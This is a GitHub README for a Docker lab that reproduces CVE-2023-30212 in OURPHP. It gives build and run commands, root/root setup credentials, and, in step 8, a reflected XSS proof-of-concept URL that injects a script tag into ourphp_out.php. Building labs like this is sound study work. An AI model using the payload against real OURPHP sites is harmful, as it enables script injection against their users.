AAsh035/CVE-2023-30212

CVE-2023-30212 LAB SETUP

Prerequisite
Download docker.io
sudo apt install -y docker.io

STEPS

1. Download all files from my repository using the below command.
   git clone https://github.com/AAsh035/CVE-2023-30212.git
   

2. Now to make a docker image run the following command:
   sudo docker build -t vuln .
   

3. Next is to change the docker image to a conatainer.The container need to run at port 80 The command is :
   sudo docker run -d -p 80:80 vuln

4. To check if the container is up use the command:
   sudo docker ps

5. Type 127.0.0.1 in the browser and an OURPHP page will be loaded.

6. You need to configure the ourphp with the following:
   Username : root
   Password : root
   Database Name: vuln

7. Now you need to configure username and password for Administrative. Set the following:
   Username: root
   Password: root

8. Now copy the below link and paste it in the browser:
   http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

CVE-2023-30212.POC.mp4